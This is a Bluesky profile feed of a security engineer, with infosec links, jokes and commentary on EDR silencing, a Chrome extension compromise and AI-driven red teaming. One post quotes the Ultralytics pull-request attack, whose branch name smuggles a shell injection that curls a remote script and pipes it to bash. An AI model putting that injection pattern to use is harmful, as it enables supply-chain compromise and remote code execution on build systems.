bruno

@0xbruno.bsky.social

application & cloud security stuff | philosophy, chess, weight lifting, and whiskey enjoyer

71 Followers  |  309 Following  |  31 Posts  |  Joined: 22.10.2024  |  1.7445

Latest posts by 0xbruno.bsky.social on Bluesky

SSH Tunneling over SSM Session Manager During my day job, I was assisting a developer remotely develop on an EC2 instance using the VSCode extension “Remote - SSH”. As a Security Engineer™, I would prefer not to open any SSH ports to the i...

SOCKS over SSH over AWS SSM Session Manager

0xbruno.dev/posts/cloud/...

30.07.2025 04:13 — 👍 0    🔁 0    💬 0    📌 0

✨ vibe coded malware ✨

11.04.2025 18:03 — 👍 0    🔁 0    💬 0    📌 0

Pentester = almost a hacker

31.03.2025 20:01 — 👍 0    🔁 0    💬 0    📌 0
YouTube video by Adam Chester Mythic MCP - Claude Sonnet driving Mythic (Apollo)

On PTO and bored, so playing around with MCP by exposing Mythic APIs to Claude and seeing what the result. Attempting to have it emulate threat actors while operating Apollo in a lab... would make a good sparring partner :D www.youtube.com/watch?v=ZooT...

20.03.2025 22:24 — 👍 20    🔁 6    💬 1    📌 0

I’m assuming if an Entra ID tenant has Certificate Based Authentication enabled and the CAs trusted, you could pivot from on prem ADCS issues like ESC1 to the cloud ? 🤔

12.03.2025 21:12 — 👍 0    🔁 0    💬 0    📌 0
GitHub - alufers/mitmproxy2swagger: Automagically reverse-engineer REST APIs via capturing traffic Automagically reverse-engineer REST APIs via capturing traffic - alufers/mitmproxy2swagger

Wow, how did I not use this yet?! github.com/alufers/mitm...

06.01.2025 16:21 — 👍 19    🔁 5    💬 2    📌 0
EDR Silencer and Beyond: Exploring Methods to Block EDR Communication - Part 2 Alternative methods for EDR Silencers for blocking EDR communication to disable defenses.

[NEW BLOG]
EDR Silencer and Beyond: Exploring Methods to Block EDR Communication - Part 2

In collaboration with
@fabian.bader.cloud


academy.bluraven.io/blog/edr-sil...

#redteam

01.12.2024 17:32 — 👍 18    🔁 6    💬 1    📌 0
EDR Silencer and Beyond: Exploring Methods to Block EDR Communication - Part 2 Alternative methods for EDR Silencers for blocking EDR communication to disable defenses.

cool seeing people I look up to talk more intelligently about the EDR silencing techniques

I talked about Hosts file and a local bring-your-own HTTP CONNECT “firewall” sinkhole back in November

0xbruno.dev/posts/resear...

academy.bluraven.io/blog/edr-sil...

@cyb3rmonk.bsky.social

02.01.2025 18:39 — 👍 0    🔁 0    💬 0    📌 0
Breaking: Cyberhaven Chrome Extension Compromised in Holiday Attack Campaign An attacker successfully phished a Cyberhaven employee, gained access to Chrome Web Store admin credentials, published a malicious version of the extension

An attacker successfully phished a Cyberhaven employee.

They gained access to their Chrome Web Store admin credentials and published a malicious version of the Cyberhaven extension.

Read my full writeup here:

www.vulnu.com/p/breaking-c...

Thanks @jaimeblascob.bsky.social and @johntuckner.me

27.12.2024 03:20 — 👍 40    🔁 17    💬 0    📌 0

when you have to push a remediation for a dumb security bug for compliance and devs look at you diff

27.12.2024 02:12 — 👍 0    🔁 0    💬 0    📌 0
Post image 27.12.2024 02:08 — 👍 0    🔁 0    💬 0    📌 1
Post image 25.12.2024 01:19 — 👍 0    🔁 0    💬 0    📌 0
Post image

The struggle is real.

24.12.2024 16:24 — 👍 8237    🔁 1972    💬 79    📌 247

At this pace security appliances getting popped more than other software 😅

22.12.2024 23:33 — 👍 0    🔁 0    💬 0    📌 0

Wonder who’s gonna be the Docker and k8s of agentic AI and orchestration. Think infosec will probably pivot to abusing the orchestration flows and architecture of agentic AI. Essentially adding an abstraction layer but we’ll still need knowledge of the underlying systems

20.12.2024 19:51 — 👍 2    🔁 0    💬 0    📌 0
YouTube video by Critical Thinking - Bug Bounty Podcast 8 Fav Bugs of 2024, Farewell Joel, Hello Shift - Cursor of Hacking (Ep. 100)

It was talked about here first around the 7:30 mark. So totally not my bug. I reported to MSRC anyways since I couldn’t find anything else on this topic. I’ll blog after they respond.

youtu.be/ANYtLQrT-F0?...

20.12.2024 17:35 — 👍 1    🔁 0    💬 1    📌 0
Post image

☹️

20.12.2024 14:58 — 👍 0    🔁 0    💬 0    📌 0
Proton Services Status Welcome to Proton Services's home for real-time and historical data on system performance.

protonmail is down and their status page doesn’t reflect any errors >:(

status.proton.me

17.12.2024 22:36 — 👍 0    🔁 0    💬 0    📌 0
Post image

pentesters when they remember they left an unprotected webshell on an engagement months ago

12.12.2024 18:41 — 👍 1    🔁 0    💬 0    📌 0
A simple black and white cartoon illustration showing a stylized representation of "ALL MODERN DIGITAL INFRASTRUCTURE" as a tower-like structure made of various rectangular blocks and components. Each component and layer of the structure is labeled with the word "backdoor" multiple times, suggesting widespread security vulnerabilities in digital systems. The illustration uses a minimalist style with basic geometric shapes and text annotations connected by lines pointing to different parts of the structure.


A diagram from Kaspersky showing the Operation Triangulation attack chain with neon green icons and text connected by dotted arrows. The chain begins with an “Attackers iMessage account” and progresses through multiple stages including PDF file, TrueType font exploit, ROP/JOP, NSExpression, bplist, and other technical components. Various CVE numbers are listed, including CVE-2023-41990, CVE-2023-32434, and CVE-2023-38606. The chain culminates in malware deployment through multiple exploitation steps involving Safari, kernel exploits, and validators.

blunt versus beauty

09.12.2024 17:01 — 👍 12    🔁 1    💬 0    📌 1

ethernet? you mean the wifi cable

09.12.2024 17:01 — 👍 949    🔁 142    💬 37    📌 18

getting to work with people much smarter than you is such an underrated benefit

06.12.2024 23:44 — 👍 1    🔁 1    💬 0    📌 1
GitHub - 0xBruno/Get-AzureContainerAppEnvVars: get env vars for azure container apps for easy auditing of sensitive information get env vars for azure container apps for easy auditing of sensitive information - 0xBruno/Get-AzureContainerAppEnvVars

find those sweet creds in azure container app env vars

github.com/0xBruno/Get-...

06.12.2024 23:10 — 👍 0    🔁 0    💬 0    📌 0
Picture of a Github PR with text reading

openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)


absolutely incredible attack vector

06.12.2024 03:27 — 👍 969    🔁 264    💬 17    📌 53
Post image 05.12.2024 23:58 — 👍 10603    🔁 1582    💬 105    📌 43

reading Fear and Trembling by Kierkegaard hoping for some deep insights. summary is “just trust me bro” -god

04.12.2024 00:41 — 👍 0    🔁 0    💬 0    📌 0

Definitely the internet but seems especially prevalent in infosec. One day natsec expert the next niche geopolitical expert. Meanwhile their org still has admin panels facing the web without mfa 😵‍💫

04.12.2024 00:40 — 👍 0    🔁 0    💬 0    📌 0
Post image

Was Dostoevsky a time traveler?

01.12.2024 10:35 — 👍 376    🔁 75    💬 17    📌 0
Post image 30.11.2024 15:06 — 👍 37    🔁 12    💬 2    📌 0

truly one of the skeets of all time

29.11.2024 03:37 — 👍 0    🔁 0    💬 0    📌 0

@0xbruno is following 20 prominent accounts